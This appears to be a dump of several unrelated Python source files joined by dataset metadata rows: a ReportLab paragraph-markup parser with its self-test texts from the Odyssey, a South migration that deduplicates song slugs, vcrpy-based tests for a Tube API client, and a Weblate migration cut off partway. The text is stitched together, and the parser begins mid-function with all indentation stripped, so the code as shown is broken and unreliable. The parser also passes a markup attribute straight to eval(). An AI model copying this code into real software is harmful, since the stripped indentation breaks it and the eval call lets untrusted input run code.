global _greek2Utf8
if not _greek2Utf8:
from reportlab.pdfbase.rl_codecs import RL_Codecs
import codecs
dm = decoding_map = codecs.make_identity_dict(xrange(32,256))
for k in xrange(0,32):
dm[k] = None
dm.update(RL_Codecs._RL_Codecs__rl_codecs_data['symbol'][0])
_greek2Utf8 = {}
for k,v in dm.iteritems():
if not v:
u = '\0'
else:
u = unichr(v).encode('utf8')
_greek2Utf8[chr(k)] = u
return ''.join(map(_greek2Utf8.__getitem__,data))
#------------------------------------------------------------------
# !!! NOTE !!! THIS TEXT IS NOW REPLICATED IN PARAGRAPH.PY !!!
# The ParaFormatter will be able to format the following
# tags:
# < /b > - bold
# < /i > - italics
# < u > < /u > - underline
# < strike > < /strike > - strike through
# < super > < /super > - superscript
# < sup > < /sup > - superscript
# < sub > < /sub > - subscript
# <font name=fontfamily/fontname color=colorname size=float>
# < bullet > </bullet> - bullet text (at head of para only)
# <onDraw name=callable label="a label">
# <link>link text</link>
# attributes of links
# size/fontSize=num
# name/face/fontName=name
# fg/textColor/color=color
# backcolor/backColor/bgcolor=color
# dest/destination/target/href/link=target
# <a>anchor text</a>
# attributes of anchors
# fontSize=num
# fontName=name
# fg/textColor/color=color
# backcolor/backColor/bgcolor=color
# href=href
# <a name="anchorpoint"/>
# <unichar name="unicode character name"/>
# <unichar value="unicode code point"/>
# <img src="path" width="1in" height="1in" valign="bottom"/>
# <greek> - </greek>
#
# The whole may be surrounded by <para> </para> tags
#
# It will also be able to handle any MathML specified Greek characters.
#------------------------------------------------------------------
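# Illustrative example of the markup this parser accepts (added for
# exposition; not used by the module itself):
#   <para align="center" spaceb="6">
#       <b>Bold</b>, <i>italic</i> and <font color="red" size="14">sized</font>
#       text, a <link href="http://www.reportlab.com">link</link>, an inline
#       image <img src="logo.gif" width="12" height="12"/> and the greek
#       letter &alpha;.
#   </para>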
class ParaParser(xmllib.XMLParser):
#----------------------------------------------------------
# First we will define all of the xml tag handler functions.
#
# start_<tag>(attributes)
# end_<tag>()
#
# While parsing the xml ParaFormatter will call these
# functions to handle the string formatting tags.
# At the start of each tag the corresponding field will
# be set to 1 and at the end tag the corresponding field will
# be set to 0. Then when handle_data is called the options
    # for that data will be apparent from the current settings.
#----------------------------------------------------------
def __getattr__( self, attrName ):
"""This way we can handle <TAG> the same way as <tag> (ignoring case)."""
if attrName!=attrName.lower() and attrName!="caseSensitive" and not self.caseSensitive and \
(attrName.startswith("start_") or attrName.startswith("end_")):
return getattr(self,attrName.lower())
raise AttributeError, attrName
#### bold
def start_b( self, attributes ):
self._push(bold=1)
def end_b( self ):
self._pop(bold=1)
def start_strong( self, attributes ):
self._push(bold=1)
def end_strong( self ):
self._pop(bold=1)
#### italics
def start_i( self, attributes ):
self._push(italic=1)
def end_i( self ):
self._pop(italic=1)
def start_em( self, attributes ):
self._push(italic=1)
def end_em( self ):
self._pop(italic=1)
#### underline
def start_u( self, attributes ):
self._push(underline=1)
def end_u( self ):
self._pop(underline=1)
#### strike
def start_strike( self, attributes ):
self._push(strike=1)
def end_strike( self ):
self._pop(strike=1)
#### link
def start_link(self, attributes):
self._push(**self.getAttributes(attributes,_linkAttrMap))
def end_link(self):
frag = self._stack[-1]
del self._stack[-1]
assert frag.link!=None
#### anchor
def start_a(self, attributes):
A = self.getAttributes(attributes,_anchorAttrMap)
name = A.get('name',None)
if name is not None:
name = name.strip()
if not name:
self._syntax_error('<a name="..."/> anchor variant requires non-blank name')
if len(A)>1:
self._syntax_error('<a name="..."/> anchor variant only allows name attribute')
A = dict(name=A['name'])
A['_selfClosingTag'] = 'anchor'
else:
href = A.get('href','').strip()
if not href:
self._syntax_error('<a> tag must have non-blank name or href attribute')
A['link'] = href #convert to our link form
A.pop('href')
self._push(**A)
def end_a(self):
frag = self._stack[-1]
sct = getattr(frag,'_selfClosingTag','')
if sct:
assert sct=='anchor' and frag.name,'Parser failure in <a/>'
defn = frag.cbDefn = ABag()
defn.label = defn.kind = 'anchor'
defn.name = frag.name
del frag.name, frag._selfClosingTag
self.handle_data('')
self._pop()
else:
del self._stack[-1]
assert frag.link!=None
def start_img(self,attributes):
A = self.getAttributes(attributes,_imgAttrMap)
if not A.get('src'):
self._syntax_error('<img> needs src attribute')
A['_selfClosingTag'] = 'img'
self._push(**A)
def end_img(self):
frag = self._stack[-1]
assert getattr(frag,'_selfClosingTag',''),'Parser failure in <img/>'
defn = frag.cbDefn = ABag()
defn.kind = 'img'
defn.src = getattr(frag,'src',None)
defn.image = ImageReader(defn.src)
size = defn.image.getSize()
defn.width = getattr(frag,'width',size[0])
defn.height = getattr(frag,'height',size[1])
defn.valign = getattr(frag,'valign','bottom')
del frag._selfClosingTag
self.handle_data('')
self._pop()
#### super script
def start_super( self, attributes ):
self._push(super=1)
def end_super( self ):
self._pop(super=1)
start_sup = start_super
end_sup = end_super
#### sub script
def start_sub( self, attributes ):
self._push(sub=1)
def end_sub( self ):
self._pop(sub=1)
#### greek script
#### add symbol encoding
def handle_charref(self, name):
try:
if name[0]=='x':
n = int(name[1:],16)
else:
n = int(name)
except ValueError:
self.unknown_charref(name)
return
self.handle_data(unichr(n).encode('utf8'))
def handle_entityref(self,name):
if greeks.has_key(name):
self.handle_data(greeks[name])
else:
xmllib.XMLParser.handle_entityref(self,name)
def syntax_error(self,lineno,message):
self._syntax_error(message)
def _syntax_error(self,message):
if message[:10]=="attribute " and message[-17:]==" value not quoted": return
self.errors.append(message)
def start_greek(self, attr):
self._push(greek=1)
def end_greek(self):
self._pop(greek=1)
def start_unichar(self, attr):
if attr.has_key('name'):
if attr.has_key('code'):
self._syntax_error('<unichar/> invalid with both name and code attributes')
try:
v = unicodedata.lookup(attr['name']).encode('utf8')
except KeyError:
                self._syntax_error('<unichar/> invalid name attribute\n"%s"' % attr['name'])
v = '\0'
elif attr.has_key('code'):
try:
v = unichr(int(eval(attr['code']))).encode('utf8')
except:
self._syntax_error('<unichar/> invalid code attribute %s' % attr['code'])
v = '\0'
else:
v = None
if attr:
self._syntax_error('<unichar/> invalid attribute %s' % attr.keys()[0])
if v is not None:
self.handle_data(v)
self._push(_selfClosingTag='unichar')
def end_unichar(self):
self._pop()
def start_font(self,attr):
self._push(**self.getAttributes(attr,_fontAttrMap))
def end_font(self):
self._pop()
def start_br(self, attr):
#just do the trick to make sure there is no content
self._push(_selfClosingTag='br',lineBreak=True,text='')
def end_br(self):
frag = self._stack[-1]
assert frag._selfClosingTag=='br' and frag.lineBreak,'Parser failure in <br/>'
del frag._selfClosingTag
self.handle_data('')
self._pop()
def _initial_frag(self,attr,attrMap,bullet=0):
style = self._style
if attr!={}:
style = copy.deepcopy(style)
_applyAttributes(style,self.getAttributes(attr,attrMap))
self._style = style
# initialize semantic values
frag = ParaFrag()
frag.sub = 0
frag.super = 0
frag.rise = 0
frag.underline = 0
frag.strike = 0
frag.greek = 0
frag.link = None
if bullet:
frag.fontName, frag.bold, frag.italic = ps2tt(style.bulletFontName)
frag.fontSize = style.bulletFontSize
frag.textColor = hasattr(style,'bulletColor') and style.bulletColor or style.textColor
else:
frag.fontName, frag.bold, frag.italic = ps2tt(style.fontName)
frag.fontSize = style.fontSize
frag.textColor = style.textColor
return frag
def start_para(self,attr):
self._stack = [self._initial_frag(attr,_paraAttrMap)]
def end_para(self):
self._pop()
def start_bullet(self,attr):
if hasattr(self,'bFragList'):
self._syntax_error('only one <bullet> tag allowed')
self.bFragList = []
frag = self._initial_frag(attr,_bulletAttrMap,1)
frag.isBullet = 1
self._stack.append(frag)
def end_bullet(self):
self._pop()
#---------------------------------------------------------------
def start_seqdefault(self, attr):
try:
default = attr['id']
except KeyError:
default = None
self._seq.setDefaultCounter(default)
def end_seqdefault(self):
pass
def start_seqreset(self, attr):
try:
id = attr['id']
except KeyError:
id = None
try:
base = int(attr['base'])
except:
base=0
self._seq.reset(id, base)
def end_seqreset(self):
pass
def start_seqchain(self, attr):
try:
order = attr['order']
except KeyError:
order = ''
order = order.split()
seq = self._seq
for p,c in zip(order[:-1],order[1:]):
seq.chain(p, c)
end_seqchain = end_seqreset
def start_seqformat(self, attr):
try:
id = attr['id']
except KeyError:
id = None
try:
value = attr['value']
except KeyError:
value = '1'
self._seq.setFormat(id,value)
end_seqformat = end_seqreset
# AR hacking in aliases to allow the proper casing for RML.
# the above ones should be deprecated over time. 2001-03-22
start_seqDefault = start_seqdefault
end_seqDefault = end_seqdefault
start_seqReset = start_seqreset
end_seqReset = end_seqreset
start_seqChain = start_seqchain
end_seqChain = end_seqchain
start_seqFormat = start_seqformat
end_seqFormat = end_seqformat
def start_seq(self, attr):
#if it has a template, use that; otherwise try for id;
#otherwise take default sequence
if attr.has_key('template'):
templ = attr['template']
self.handle_data(templ % self._seq)
return
elif attr.has_key('id'):
id = attr['id']
else:
id = None
increment = attr.get('inc', None)
if not increment:
output = self._seq.nextf(id)
else:
#accepts "no" for do not increment, or an integer.
#thus, 0 and 1 increment by the right amounts.
if increment.lower() == 'no':
output = self._seq.thisf(id)
else:
incr = int(increment)
output = self._seq.thisf(id)
self._seq.reset(id, self._seq._this() + incr)
self.handle_data(output)
def end_seq(self):
pass
def start_onDraw(self,attr):
defn = ABag()
if attr.has_key('name'): defn.name = attr['name']
else: self._syntax_error('<onDraw> needs at least a name attribute')
if attr.has_key('label'): defn.label = attr['label']
defn.kind='onDraw'
self._push(cbDefn=defn)
self.handle_data('')
self._pop()
#---------------------------------------------------------------
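    # Tag handlers maintain a stack of ParaFrag objects: entering a tag pushes
    # a copy of the current frag with that tag's attributes applied; leaving it
    # pops the frag (optionally asserting the expected attribute values).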
def _push(self,**attr):
frag = copy.copy(self._stack[-1])
_applyAttributes(frag,attr)
self._stack.append(frag)
def _pop(self,**kw):
frag = self._stack[-1]
del self._stack[-1]
for k, v in kw.items():
assert getattr(frag,k)==v
return frag
def getAttributes(self,attr,attrMap):
A = {}
for k, v in attr.items():
if not self.caseSensitive:
k = string.lower(k)
if k in attrMap.keys():
j = attrMap[k]
func = j[1]
try:
A[j[0]] = (func is None) and v or func(v)
except:
self._syntax_error('%s: invalid value %s'%(k,v))
else:
self._syntax_error('invalid attribute name %s'%k)
return A
#----------------------------------------------------------------
def __init__(self,verbose=0):
self.caseSensitive = 0
xmllib.XMLParser.__init__(self,verbose=verbose)
def _iReset(self):
self.fragList = []
if hasattr(self, 'bFragList'): delattr(self,'bFragList')
def _reset(self, style):
'''reset the parser'''
xmllib.XMLParser.reset(self)
# initialize list of string segments to empty
self.errors = []
self._style = style
self._iReset()
#----------------------------------------------------------------
def handle_data(self,data):
"Creates an intermediate representation of string segments."
frag = copy.copy(self._stack[-1])
if hasattr(frag,'cbDefn'):
kind = frag.cbDefn.kind
if data: self._syntax_error('Only empty <%s> tag allowed' % kind)
elif hasattr(frag,'_selfClosingTag'):
if data!='': self._syntax_error('No content allowed in %s tag' % frag._selfClosingTag)
return
else:
# if sub and super are both on they will cancel each other out
if frag.sub == 1 and frag.super == 1:
frag.sub = 0
frag.super = 0
if frag.sub:
frag.rise = -frag.fontSize*subFraction
frag.fontSize = max(frag.fontSize-sizeDelta,3)
elif frag.super:
frag.rise = frag.fontSize*superFraction
frag.fontSize = max(frag.fontSize-sizeDelta,3)
if frag.greek:
frag.fontName = 'symbol'
data = _greekConvert(data)
# bold, italic, and underline
frag.fontName = tt2ps(frag.fontName,frag.bold,frag.italic)
#save our data
frag.text = data
if hasattr(frag,'isBullet'):
delattr(frag,'isBullet')
self.bFragList.append(frag)
else:
self.fragList.append(frag)
def handle_cdata(self,data):
self.handle_data(data)
def _setup_for_parse(self,style):
self._seq = reportlab.lib.sequencer.getSequencer()
self._reset(style) # reinitialise the parser
def parse(self, text, style):
"""Given a formatted string will return a list of
ParaFrag objects with their calculated widths.
If errors occur None will be returned and the
self.errors holds a list of the error messages.
"""
# AR 20040612 - when we feed Unicode strings in, sgmlop
# tries to coerce to ASCII. Must intercept, coerce to
# any 8-bit encoding which defines most of 256 points,
# and revert at end. Yuk. Preliminary step prior to
# removal of parser altogether.
enc = self._enc = 'utf8' #our legacy default
self._UNI = type(text) is UnicodeType
if self._UNI:
text = text.encode(enc)
self._setup_for_parse(style)
# the xmlparser requires that all text be surrounded by xml
# tags, therefore we must throw some unused flags around the
# given string
if not(len(text)>=6 and text[0]=='<' and _re_para.match(text)):
text = "<para>"+text+"</para>"
self.feed(text)
self.close() # force parsing to complete
return self._complete_parse()
def _complete_parse(self):
del self._seq
style = self._style
del self._style
if len(self.errors)==0:
fragList = self.fragList
bFragList = hasattr(self,'bFragList') and self.bFragList or None
self._iReset()
else:
fragList = bFragList = None
if self._UNI:
#reconvert to unicode
if fragList:
for frag in fragList:
frag.text = unicode(frag.text, self._enc)
if bFragList:
for frag in bFragList:
frag.text = unicode(frag.text, self._enc)
return style, fragList, bFragList
def _tt_parse(self,tt):
tag = tt[0]
try:
start = getattr(self,'start_'+tag)
end = getattr(self,'end_'+tag)
except AttributeError:
raise ValueError('Invalid tag "%s"' % tag)
start(tt[1] or {})
C = tt[2]
if C:
M = self._tt_handlers
for c in C:
M[type(c) is TupleType](c)
end()
def tt_parse(self,tt,style):
'''parse from tupletree form'''
self._setup_for_parse(style)
self._tt_handlers = self.handle_data,self._tt_parse
self._tt_parse(tt)
return self._complete_parse()
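# A sketch of the tuple-tree form tt_parse consumes, inferred from how
# _tt_parse indexes tt as (tag, attribute-dict-or-None, child-list-or-None);
# treat the exact shape as an illustrative assumption, not the canonical format:
#
#   tt = ('para', None, ['plain ', ('b', None, ['bold text']), ' more'])
#   style, frags, bullet_frags = ParaParser().tt_parse(tt, style)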
if __name__=='__main__':
from reportlab.platypus import cleanBlockQuotedText
_parser=ParaParser()
def check_text(text,p=_parser):
print '##########'
text = cleanBlockQuotedText(text)
l,rv,bv = p.parse(text,style)
if rv is None:
for l in _parser.errors:
print l
else:
print 'ParaStyle', l.fontName,l.fontSize,l.textColor
for l in rv:
print l.fontName,l.fontSize,l.textColor,l.bold, l.rise, '|%s|'%l.text[:25],
if hasattr(l,'cbDefn'):
print 'cbDefn',getattr(l.cbDefn,'name',''),getattr(l.cbDefn,'label',''),l.cbDefn.kind
else: print
style=ParaFrag()
style.fontName='Times-Roman'
style.fontSize = 12
style.textColor = black
    style.bulletColor = black
style.bulletFontName='Times-Roman'
style.bulletFontSize=12
text='''
<b><i><greek>a</greek>D</i></b>β<unichr value="0x394"/>
<font name="helvetica" size="15" color=green>
Tell me, O muse, of that ingenious hero who travelled far and wide
after</font> he had sacked the famous town of Troy. Many cities did he visit,
and many were the nations with whose manners and customs he was acquainted;
moreover he suffered much by sea while trying to save his own life
and bring his men safely home; but do what he might he could not save
his men, for they perished through their own sheer folly in eating
the cattle of the Sun-god Hyperion; so the god prevented them from
ever reaching home. Tell me, too, about all these things, O daughter
of Jove, from whatsoever source you<super>1</super> may know them.
'''
check_text(text)
check_text('<para> </para>')
check_text('<para font="times-bold" size=24 leading=28.8 spaceAfter=72>ReportLab -- Reporting for the Internet Age</para>')
check_text('''
<font color=red>τ</font>Tell me, O muse, of that ingenious hero who travelled far and wide
after he had sacked the famous town of Troy. Many cities did he visit,
and many were the nations with whose manners and customs he was acquainted;
moreover he suffered much by sea while trying to save his own life
and bring his men safely home; but do what he might he could not save
his men, for they perished through their own sheer folly in eating
the cattle of the Sun-god Hyperion; so the god prevented them from
ever reaching home. Tell me, too, about all these things, O daughter
of Jove, from whatsoever source you may know them.''')
check_text('''
Telemachus took this speech as of good omen and rose at once, for
he was bursting with what he had to say. He stood in the middle of
the assembly and the good herald Pisenor brought him his staff. Then,
turning to Aegyptius, "Sir," said he, "it is I, as you will shortly
learn, who have convened you, for it is I who am the most aggrieved.
I have not got wind of any host approaching about which I would warn
you, nor is there any matter of public moment on which I would speak.
    My grievance is purely personal, and turns on two great misfortunes
which have fallen upon my house. The first of these is the loss of
my excellent father, who was chief among all you here present, and
was like a father to every one of you; the second is much more serious,
and ere long will be the utter ruin of my estate. The sons of all
the chief men among you are pestering my mother to marry them against
her will. They are afraid to go to her father Icarius, asking him
to choose the one he likes best, and to provide marriage gifts for
his daughter, but day by day they keep hanging about my father's house,
sacrificing our oxen, sheep, and fat goats for their banquets, and
never giving so much as a thought to the quantity of wine they drink.
No estate can stand such recklessness; we have now no Ulysses to ward
off harm from our doors, and I cannot hold my own against them. I
shall never all my days be as good a man as he was, still I would
indeed defend myself if I had power to do so, for I cannot stand such
treatment any longer; my house is being disgraced and ruined. Have
respect, therefore, to your own consciences and to public opinion.
Fear, too, the wrath of heaven, lest the gods should be displeased
and turn upon you. I pray you by Jove and Themis, who is the beginning
and the end of councils, [do not] hold back, my friends, and leave
me singlehanded- unless it be that my brave father Ulysses did some
wrong to the Achaeans which you would now avenge on me, by aiding
and abetting these suitors. Moreover, if I am to be eaten out of house
and home at all, I had rather you did the eating yourselves, for I
could then take action against you to some purpose, and serve you
with notices from house to house till I got paid in full, whereas
now I have no remedy."''')
check_text('''
But as the sun was rising from the fair sea into the firmament of
heaven to shed light on mortals and immortals, they reached Pylos
the city of Neleus. Now the people of Pylos were gathered on the sea
shore to offer sacrifice of black bulls to Neptune lord of the Earthquake.
There were nine guilds with five hundred men in each, and there were
nine bulls to each guild. As they were eating the inward meats and
burning the thigh bones [on the embers] in the name of Neptune, Telemachus
and his crew arrived, furled their sails, brought their ship to anchor,
and went ashore. ''')
check_text('''
So the neighbours and kinsmen of Menelaus were feasting and making
merry in his house. There was a bard also to sing to them and play
his lyre, while two tumblers went about performing in the midst of
them when the man struck up with his tune.]''')
check_text('''
"When we had passed the [Wandering] rocks, with Scylla and terrible
Charybdis, we reached the noble island of the sun-god, where were
the goodly cattle and sheep belonging to the sun Hyperion. While still
    at sea in my ship I could hear the cattle lowing as they came home
to the yards, and the sheep bleating. Then I remembered what the blind
Theban prophet Teiresias had told me, and how carefully Aeaean Circe
had warned me to shun the island of the blessed sun-god. So being
much troubled I said to the men, 'My men, I know you are hard pressed,
but listen while I <strike>tell you the prophecy that</strike> Teiresias made me, and
how carefully Aeaean Circe warned me to shun the island of the blessed
sun-god, for it was here, she said, that our worst danger would lie.
Head the ship, therefore, away from the island.''')
check_text('''A<B>C&D"E'F''')
check_text('''A< B> C& D" E' F''')
check_text('''<![CDATA[<>&'"]]>''')
check_text('''<bullet face=courier size=14 color=green>+</bullet>
There was a bard also to sing to them and play
his lyre, while two tumblers went about performing in the midst of
them when the man struck up with his tune.]''')
check_text('''<onDraw name="myFunc" label="aaa bbb">A paragraph''')
check_text('''<para><onDraw name="myFunc" label="aaa bbb">B paragraph</para>''')
# HVB, 30.05.2003: Test for new features
_parser.caseSensitive=0
check_text('''Here comes <FONT FACE="Helvetica" SIZE="14pt">Helvetica 14</FONT> with <STRONG>strong</STRONG> <EM>emphasis</EM>.''')
check_text('''Here comes <font face="Helvetica" size="14pt">Helvetica 14</font> with <Strong>strong</Strong> <em>emphasis</em>.''')
check_text('''Here comes <font face="Courier" size="3cm">Courier 3cm</font> and normal again.''')
check_text('''Before the break <br/>the middle line <br/> and the last line.''')
check_text('''This should be an inline image <img src='../docs/images/testimg.gif'/>!''')
check_text('''aaa bbbb <u>underline </u> cccc''')
| bsd-3-clause | 6,241,397,755,660,166,000 | 34.284906 | 135 | 0.557778 | false |
romulojales/to-be-musician | to_be_a_musician/songs/migrations/0005_remove_duplicate_slugs.py | 1 | 7856 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
# Note: Don't use "from appname.models import ModelName".
# Use orm.ModelName to refer to models in this application,
# and orm['appname.ModelName'] for models in other applications.
songs = orm.Song.objects.select_related().order_by('artist__name',
'album__name',
'slug',
'id')
for song in songs:
duplicated_songs = (orm.Song.objects
.filter(artist__slug=song.artist.slug,
album__slug=song.album.slug,
slug=song.slug)
.exclude(pk=song.pk))
i = 1
for duplicated_song in duplicated_songs:
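                # truncate to 47 chars so the appended '-N' suffix keeps the
                # slug within the model's 50-character limit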
duplicated_song.slug = '{0}-{1}'.format(duplicated_song.slug[:47], i)
duplicated_song.save()
i += 1
def backwards(self, orm):
raise RuntimeError('Cannot reverse this migration.')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'songs.album': {
'Meta': {'object_name': 'Album'},
'api_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "'name'", 'overwrite': 'False'})
},
u'songs.artist': {
'Meta': {'object_name': 'Artist'},
'api_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "'name'", 'overwrite': 'False'})
},
u'songs.interpretation': {
'Meta': {'object_name': 'Interpretation'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_update': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'song': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['songs.Song']"}),
'songsterr_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'soundcloud_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '36', 'blank': 'True'}),
'youtube_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'songs.song': {
'Meta': {'object_name': 'Song'},
'album': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['songs.Album']"}),
'api_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'artist': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['songs.Artist']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "'name'", 'overwrite': 'False'}),
'tinysong_url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['songs']
symmetrical = True
| apache-2.0 | -7,906,301,131,644,745,000 | 69.142857 | 208 | 0.53055 | false |
adamgilman/tube-python | tube/tests/test_tflAPI.py | 1 | 3067 | import unittest
from tube.tflAPI import TFLapi
import vcr
my_vcr = vcr.VCR(
serializer = 'json',
cassette_library_dir = 'tube/tests/fixtures/cassettes',
record_mode = 'once',
match_on = ['uri', 'method'],
)
import logging
logging.basicConfig() # you need to initialize logging, otherwise you will not see anything from vcrpy
vcr_log = logging.getLogger("vcr")
vcr_log.setLevel(logging.ERROR)
class TestTFLapiByURL(unittest.TestCase):
def setUp(self):
self.api = TFLapi()
def test_VerifyCorrectURLFetched(self):
with my_vcr.use_cassette('Detail-OXC-B.json'):
detail = self.api.getDetailed(station="OXC", line="B")
self.assertEqual(detail.station, "OXC")
self.assertEqual(detail.line, "B")
def test_VerifyPlatformsQuantities(self):
#camden town has 4 northern line platforms
with my_vcr.use_cassette('Detail-CTN-N.json'):
detail = self.api.getDetailed(station="CTN", line="N")
self.assertEqual(detail.station, "CTN")
self.assertIsInstance(detail.platforms, list)
self.assertEqual( len(detail.platforms), 4)
#oxford circus has 2 bakerloo platforms
with my_vcr.use_cassette('Detail-OXC-B.json'):
detail = self.api.getDetailed(station="OXC", line="B")
self.assertEqual(detail.station, "OXC")
self.assertIsInstance(detail.platforms, list)
self.assertEqual( len(detail.platforms), 2)
def test_VerifyPlatformsIdentified(self):
with my_vcr.use_cassette('Detail-CTN-N.json'):
detail = self.api.getDetailed(station="CTN", line="N")
self.assertEqual(detail.platforms[0].name, "Northbound - Platform 1")
self.assertEqual(detail.platforms[1].name, "Southbound - Platform 2")
self.assertEqual(detail.platforms[2].name, "Northbound - Platform 3")
self.assertEqual(detail.platforms[3].name, "Southbound - Platform 4")
def test_VerifyTrainsOnPlatforms(self):
#need testcase for no trains on platforms
with my_vcr.use_cassette('Detail-OXC-B(TrainCode).json'):
detail = self.api.getDetailed(station="OXC", line="B")
self.assertIsInstance(detail.platforms[0].trains, list)
self.assertEqual(detail.platforms[0].trains[0].leadingcar_id, "1031576")
self.assertEqual(detail.platforms[0].trains[0].set_number, "236")
self.assertEqual(detail.platforms[0].trains[0].trip_number, "12")
self.assertEqual(detail.platforms[0].trains[0].arrival_seconds, "24")
self.assertEqual(detail.platforms[0].trains[0].arrival_time, "0:30")
self.assertEqual(detail.platforms[0].trains[0].current_location, "Between Regents Park and Oxford Circus")
self.assertEqual(detail.platforms[0].trains[0].destination, "Elephant and Castle")
self.assertEqual(detail.platforms[0].trains[0].destination_code, "154")
self.assertEqual(detail.platforms[0].trains[0].platform_departure_time, "15:28:23")
self.assertEqual(detail.platforms[0].trains[0].interval_between_previous_train, "24")
self.assertEqual(detail.platforms[0].trains[0].departed_current_station, "0")
self.assertEqual(detail.platforms[0].trains[0].direction, "0")
self.assertEqual(detail.platforms[0].trains[0].track_code, "TB391B") | bsd-3-clause | 7,684,105,499,917,301,000 | 43.463768 | 109 | 0.738507 | false |
dontnod/weblate | weblate/trans/migrations/0021_auto_20190321_1004.py | 1 | 3976 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.17 on 2019-03-21 10:04
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("trans", "0020_auto_20190321_0921")]
operations = [
migrations.AddField(
model_name="change",
name="alert",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="trans.Alert",
),
),
migrations.AddField(
model_name="change",
name="whiteboard",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="trans.WhiteboardMessage",
),
),
migrations.AlterField(
model_name="change",
name="action",
field=models.IntegerField(
choices=[
(0, "Resource update"),
(1, "Translation completed"),
(2, "Translation changed"),
(5, "New translation"),
(3, "Comment added"),
(4, "Suggestion added"),
(6, "Automatic translation"),
(7, "Suggestion accepted"),
(8, "Translation reverted"),
(9, "Translation uploaded"),
(10, "Glossary added"),
(11, "Glossary updated"),
(12, "Glossary uploaded"),
(13, "New source string"),
(14, "Component locked"),
(15, "Component unlocked"),
(16, "Found duplicated string"),
(17, "Committed changes"),
(18, "Pushed changes"),
(19, "Reset repository"),
(20, "Merged repository"),
(21, "Rebased repository"),
(22, "Failed merge on repository"),
(23, "Failed rebase on repository"),
(28, "Failed push on repository"),
(24, "Parse error"),
